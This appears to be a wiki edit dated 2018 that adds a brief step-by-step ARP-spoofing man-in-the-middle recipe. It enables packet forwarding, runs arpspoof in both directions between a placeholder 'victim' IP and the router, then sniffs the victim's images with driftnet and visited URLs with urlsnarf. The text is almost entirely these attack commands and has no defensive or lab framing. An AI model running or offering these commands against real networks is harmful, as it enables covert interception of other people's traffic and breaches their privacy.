395 bytes added
, 21:53, 13 July 2018
= Method 1 =
=== Enable Packet forwarding ===
sysctl -w net.ipv4.ip_forward=1
=== Intercept packets from victim ===
arpspoof -i [network interface name] -t [victim IP] [router IP]
=== Intercept packets from the router ===
arpspoof -i [network interface name] -t [router IP] [victim IP]
=== Sniff images ===
driftnet -i [network interface]
=== Sniff URLs ===
urlsnarf -i [network interface]